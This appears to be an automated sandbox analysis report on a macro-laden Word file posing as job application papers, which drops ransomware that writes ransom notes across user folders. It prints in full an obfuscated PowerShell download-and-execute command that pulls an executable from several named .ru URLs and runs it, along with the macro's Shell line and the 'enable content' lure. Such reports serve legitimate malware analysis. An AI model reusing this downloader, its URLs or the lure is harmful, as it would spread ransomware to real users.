Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\Managed\Word Document Building Blocks\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Document Themes\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Document Themes\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\SmartArt Graphics\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\SmartArt Graphics\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\UProof\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Word\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Word\STARTUP\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Extensions\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\bookmarkbackups\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\crashes\events\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\datareporting\archived\2016-12\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp\WINNT_x86-msvc\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-eme-adobe\15\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\gmp-gmpopenh264\1.5.3\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\healthreport\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\minidumps\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\saved-telemetry-pings\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\webapps\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Sun\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Sun\Java\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Sun\Java\Deployment\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Contacts\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\BJZFPPWAPT\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\BNAGMGSPLO\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\EOWRVPQCCS\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\GIGIYTFFYT\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\LSBIHQFDVT\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\MXPXCVPDVN\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\NEBFQQYWPS\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\QCOILOQIKC\PSVULHG-MANUAL.txt	Jump to dropped file
Source: C:\Windows\Temp\229.exe	File created: C:\Users\user\Desktop\SFPUSAFIOL\PSVULHG-MANUAL.txt	Jump to dropped file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Inhalt aktivieren" im gelben Bereich und danach auf "Bearbeitung aktivieren"
Source: Document image extraction number: 0	Screenshot OCR: Bearbeitung aktivieren"

Document contains an embedded VBA macro which may execute processes

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

OLE, VBA macro line: pcbBtz = Shell(StrReverse(sYNoxQh), 0)

Powershell connects to network

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 78.155.218.207 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 90.156.201.98 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 92.53.96.93 443	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 92.53.98.31 443	Jump to behavior

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Windows\Temp\229.exe

Jump to dropped file

Contains functionality to call native functions

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040803D lstrlenW,lstrlenW,wsprintfW,wsprintfW,NtSetInformationFile,GetModuleHandleW,GetProcAddress,NtSetInformationFile,NtSetInformationFile,MoveFileExW,

5_2_0040803D

Creates files inside the system directory

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: c:\windows\temp\229.exe

Jump to behavior

Creates mutexes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\Temp\229.exe	Mutant created: \Sessions\2\BaseNamedObjects\AversSucksForever

Deletes files inside the Windows folder

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\229.exe

Jump to behavior

Detected potential crypto function

Show sources

Source: C:\Windows\Temp\229.exe	Code function: 5_2_00415EBC	5_2_00415EBC
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00407D0B	5_2_00407D0B
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0041E147	5_2_0041E147
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00434324	5_2_00434324
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0041E3AE	5_2_0041E3AE
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00434448	5_2_00434448
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042EC91	5_2_0042EC91
Source: C:\Windows\Temp\229.exe	Code function: 5_2_004234BD	5_2_004234BD
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00421620	5_2_00421620
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0041DF13	5_2_0041DF13
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0041E147	5_1_0041E147
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00431159	5_1_00431159
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0040E130	5_1_0040E130
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00419275	5_1_00419275
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00434324	5_1_00434324
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0041E3AE	5_1_0041E3AE
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00434448	5_1_00434448
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0041648B	5_1_0041648B
Source: C:\Windows\Temp\229.exe	Code function: 5_1_004234BD	5_1_004234BD
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0041852C	5_1_0041852C
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00421620	5_1_00421620
Source: C:\Windows\Temp\229.exe	Code function: 5_1_004196AA	5_1_004196AA
Source: C:\Windows\Temp\229.exe	Code function: 5_1_004057C0	5_1_004057C0
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00414A70	5_1_00414A70
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00418A28	5_1_00418A28
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0040BB10	5_1_0040BB10
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0040ABD0	5_1_0040ABD0
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042EC91	5_1_0042EC91
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00411DD0	5_1_00411DD0
Source: C:\Windows\Temp\229.exe	Code function: 5_1_00418E40	5_1_00418E40
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042AF59	5_1_0042AF59
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0041DF13	5_1_0041DF13

Document contains an embedded VBA macro which executes code when the document is opened / closed

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open			Name: Document_Open

Document contains embedded VBA macros

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

OLE indicator, VBA macros: true

Document contains no OLE stream with summary information

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

OLE indicator has summary info: false

Document has an unknown application name

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

OLE indicator application name: unknown

Document misses a certain OLE stream usually present in this Microsoft Office document type

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Show sources

Source: C:\Windows\Temp\229.exe	Code function: String function: 00416050 appears 52 times
Source: C:\Windows\Temp\229.exe	Code function: String function: 00420996 appears 47 times
Source: C:\Windows\Temp\229.exe	Code function: String function: 004136FB appears 33 times

PE file contains strange resources

Show sources

Source: 229.exe.4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal100.rans.spre.phis.spyw.expl.evad.winDOC@7/398@5/4

Contains functionality to check free disk space

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040A4E1 VirtualAlloc,VirtualAlloc,wsprintfW,VirtualAlloc,wsprintfW,wsprintfW,VirtualAlloc,VirtualFree,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,VirtualAlloc,wsprintfW,GetNativeSystemInfo,VirtualAlloc,wsprintfW,lstrlenW,VirtualAlloc,VirtualAlloc,lstrlenW,wsprintfW,lstrlenW,VirtualFree,VirtualAlloc,GetDriveTypeW,GetDiskFreeSpaceW,lstrlenW,wsprintfW,wsprintfW,lstrlenW,wsprintfW,lstrlenW,

5_2_0040A4E1

Contains functionality to enum processes or threads

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040744A CreateToolhelp32Snapshot,VirtualAlloc,

5_2_0040744A

Contains functionality to instantiate COM classes

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040EC32 LoadLibraryW,GetProcAddress,lstrlenW,lstrlenW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,CreateFileW,WriteFile,Sleep,CloseHandle,CoInitialize,CoCreateInstance,CreateEventW,CoUninitialize,WaitForSingleObject,

5_2_0040EC32

Creates files inside the program directory

Show sources

Source: C:\Windows\Temp\229.exe

File created: C:\Program Files\PSVULHG-MANUAL.txt

Jump to behavior

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$rah_Siedler_Bewerbungsunterlagen.doc

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR7C05.tmp

Jump to behavior

Document contains summary information with irregular field values

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc	OLE document summary: title field not present or empty
Source: Sarah_Siedler_Bewerbungsunterlagen.doc	OLE document summary: author field not present or empty
Source: Sarah_Siedler_Bewerbungsunterlagen.doc	OLE document summary: edited time not present or 0

Might use command line arguments

Show sources

Source: C:\Windows\Temp\229.exe	Command line argument: update	5_1_00410B20
Source: C:\Windows\Temp\229.exe	Command line argument: generate	5_1_00410B20
Source: C:\Windows\Temp\229.exe	Command line argument: 8G)	5_1_00410B20
Source: C:\Windows\Temp\229.exe	Command line argument: p`)	5_1_00410B20

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

virustotal: Detection: 47%

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);
Source: unknown	Process created: C:\Windows\Temp\229.exe 'C:\windows\temp\229.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe c:\\windows\\system32\\cmd /c set p=power&& set s=shell&& call %p%%s% $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $jFW34y5D = '$xp8tH = new-obj000ect -com000obj000ect wsc000ript.she000ll;$kCV9kL = new-object sys000tem.net.web000client;$DRYNu1fkG = new-object random;$ieNiLHVBJ = \'000h000t000t000p000s://starstyl.ru/assets/plugins/managermanager/widgets/mm_hidetabs/word.exe,000h000t000t000p000://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe,000h000t000t000p000s://jewemsk.ru/core/components/gallery/lexicon/fr/word.exe,000h000t000t000p000://sndtgo.ru/word.exe,000h000t000t000p000://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe\'.spl000it(\',\');$E3HiWI = $DRYNu1fkG.nex000t(1, 65536);$GsKdHAtm1 = \'c:\win000dows\tem000p\229.ex000e\';for000each($JY4LV in $ieNiLHVBJ){try{$kCV9kL.dow000nlo000adf000ile($JY4LV.ToS000tring(), $GsKdHAtm1);sta000rt-pro000cess $GsKdHAtm1;break;}catch{}}'.replace('000', $PYEHf);$iwHcp = '';iex($jFW34y5D);	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Temp\229.exe 'C:\windows\temp\229.exe'	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Writes ini files

Show sources

Source: C:\Windows\Temp\229.exe

File written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.ini

Jump to behavior

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Creates a directory in C:\Program Files

Show sources

Source: C:\Windows\Temp\229.exe	Directory created: C:\Program Files\PSVULHG-MANUAL.txt			Jump to behavior
Source: C:\Windows\Temp\229.exe	Directory created: C:\Program Files\3c4e07e63c4e000531d.lock			Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: GoogleUpdate_unsigned.pdb source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdb;;b source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source:	Binary string: GoogleCrashHandler_unsigned.pdb{ source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp
Source:	Binary string: C:\attr\Release\Workflows.pdb source: 229.exe, 00000005.00000002.1855800874.00437000.00000002.sdmp
Source:	Binary string: mation.pdb source: powershell.exe, 00000004.00000002.1671233879.00215000.00000004.sdmp
Source:	Binary string: indows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source:	Binary string: GoogleCrashHandler_unsigned.pdb source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp
Source:	Binary string: mscorlib.pdbment.Automation.pdb source: powershell.exe, 00000004.00000002.1675202125.0537D000.00000004.sdmp
Source:	Binary string: rlib.pdb source: powershell.exe, 00000004.00000002.1675202125.0537D000.00000004.sdmp
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000004.00000002.1672560981.01D87000.00000004.sdmp
Source:	Binary string: C:\Windows\dll\mscorlib.pdb( source: powershell.exe, 00000004.00000002.1675202125.0537D000.00000004.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.1672317892.01BB0000.00000002.sdmp
Source:	Binary string: C:\attr\Release\Workflows.pdb( source: 229.exe, 00000005.00000002.1855800874.00437000.00000002.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\Temp\229.exe

Code function: 5_2_0040C05D GetModuleHandleA,LoadLibraryA,GetProcAddress,

5_2_0040C05D

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\Temp\229.exe	Code function: 5_2_00415459 push edx; retf	5_2_00415463
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00414E99 push ebx; ret	5_2_00414EAB
Source: C:\Windows\Temp\229.exe	Code function: 5_2_00415144 push edx; ret	5_2_00415145
